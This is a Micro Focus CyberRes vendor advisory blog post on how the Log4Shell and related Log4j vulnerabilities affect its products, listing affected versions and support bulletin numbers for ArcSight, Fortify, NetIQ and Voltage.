5 min read time

Summary of CyberRes impact from Log4J or Log4shell/LogJam (CVE-2021-44228) | Summary of Cyberres impacted by Denial of Service (DOS) (CVE-2021-45046) | Summary of Cyberres impacted by DOS (CVE-2021-45105)

by   in Cybersecurity

Last Updated: April 26, 2022 8:35 am MST
***Indicates where an update has occurred

Micro Focus is continuing to analyze the remote code execution vulnerability of (CVE-2021-44228, CVE-2021-46046), and the Denial Of Service (CVE-2021-45105) that have been identified in the Apache Log4j components that are used in many Java-based applications. As we, along with many others in the industry, continue to identify and understand the full impact of this vulnerability, we will make that information available to our customers, in addition to information on remediation instructions, until a patch or updated release is become available.

Log4jMicro Focus’ Security teams have been actively investigating this issue since the initial disclosure, first to assess the scope of the vulnerability across our portfolio and software versions and then to devise a suitable mitigation plan for each of our products/versions that are determined to be affected. We have the indicators of compromise and are working with the Cybersecurity Infrastructure and Security Agency to stay current with changes to this situation. We have had no alerts on possible Log4J intrusions.

Impact to CyberRes products and remediation details

One of the vulnerabilities is a remote code execution vulnerability identified as CVE-2021-44228 and CVE-2021-45046, that can allow an unauthenticated attacker to gain complete access to a target system. It can be triggered when a specially crafted string is parsed and processed by the vulnerable Log4j2 component. This could happen through any user provided input.

Successful exploitation allows for arbitrary code execution in the targeted application. Attackers do not need prior access to the system to log the string and can remotely cause the logging event by using commands such as curl against a target system to log the malicious string in the application log. When processing the log, the vulnerable system reads the string and executes it, which in current attacks is used to execute the code from the malicious domain. Doing so can grant the attacker full access and control of the affected application.

There is also a Denial-of-Service vulnerability CVE-2021-45105. This allows an attacker to cause a denial of service when a crafted string is interpreted.

Given the fact that logging code and functionalities in applications and services are typically designed to process a variety of external input data coming from upper layers and from many possible vectors, the biggest risk factor of this vulnerability is predicting whether an application has a viable attack vector path that will allow the malformed exploit string to reach the vulnerable Log4j2 code and trigger the attack.

A common pattern of exploitation risk, for example, is a web application with code designed to process usernames, referrer, or user-agent strings in logs. These strings are provided as external input (e.g., a web app built with Apache Struts). An attacker can send a malformed username or set user-agent with the crafted exploit string hoping that this external input will be processed at some point by the vulnerable Log4j2 code and trigger code execution.

Log4j

CyberRes client recommendations

CyberRes SaaS Update

CyberRes is aware of the recently disclosed security issue related to the open-source Apache "Log4j2" utility (CVE-2021-44228). We are actively monitoring for this issue and have implemented additional protective and detective controls in all CyberRes SaaS environments. At this time there are no known products impacted in the SaaS environment. 

For our on-premise products:

  • We are issuing Security Bulletins with specific instructions on how to block the attack until the component is upgraded.
  • Please visit the Product Support portal for a list of the security bulletins specific to the Log4j compromise.
  • If a particular product is not listed, please continue to check the website as we are updating the list frequently.
  • If the matter is urgent and the update is not on the website, please open a support case Support Resources | Micro Focus.

If a product is not listed below, it is NOT IMPACTED unless otherwise noted on the Support Bulletin Article. 

ArcSight - Security Operations

Reference Support Bulletin KM000003049 for further updates

ArcSight Component Remediation Version
ESM KM000003127 7.2, 7.5
Logger KM000003186 7.2 and above
Recon KM000003189 All versions
Intelligence KM000003175 All versions
Connectors KM000003117 8.2 and above
Transformation Hub KM000003257 All Versions
Sentinel KM000003122 8.2 to 8.5
ArcSight Platform
(Containerized)
KM000003254 All versions

ArcSight Detection Package: Read more about ArcSight’s response to Log4j-targeting cyber attacks

Fortify - Application Security

Fortify Component Remediation Version
Audit Assistant KM000003153 19.2 and newer
Static Code Analyzer
(SCA_and_Apps)
KM000003178 20.1 and newer

Software Security Center

KM000003180 20.1 and newer

Java Runtime Agent

KM000003277 20.1 and newer

ScanCentral (SAST)

KM000003218 20.1 and newer

Application Defender

KM000003281 20.1 and newer

Read Fortify's Response to log4j (CVE-2021-44228) 

NetIQ - Identity and Access Management

NetIQ Component Remediation Version
Access Manager KM000002997 4.5 and newer
NetIQ Risk Services KM000003298 1.0 and newer
NetIQ SecureLogin
Advanced Edition
KM000003043 9.0.0.2
Change Guardian KM000003114 5.2 to 6.2
Advanced Authentication KM000003047 6.0 and newer
***Directory Resource & Administrator KM000003185 10.0, 10.1

Voltage - Data Privacy and Protection

Voltage Component Remediation Version
Structured Data
Manager
KM000003242 7.6.1 and newer
SecureData Sentry KM000003162 4.3 and below

Our Support organization has in place standard handling procedures to ensure that customers reporting the issue are responded to with the latest information from our R&D and Security teams. Knowing which versions of each Micro Focus product is deployed is a key data point to ensure that our customers receive the most appropriate action plan, once available.

If, after reviewing the guidance above, you still have an issue, please visit the Micro Focus Support portal and create a ticket. For all available bulletins, please visit the Micro Focus Security Alerts portal. 

This blog only contains information related to CyberRes products, for all other Micro Focus products, please refer to the Micro Focus Security Bulletin . 

Labels:

Security
Parents Comment Children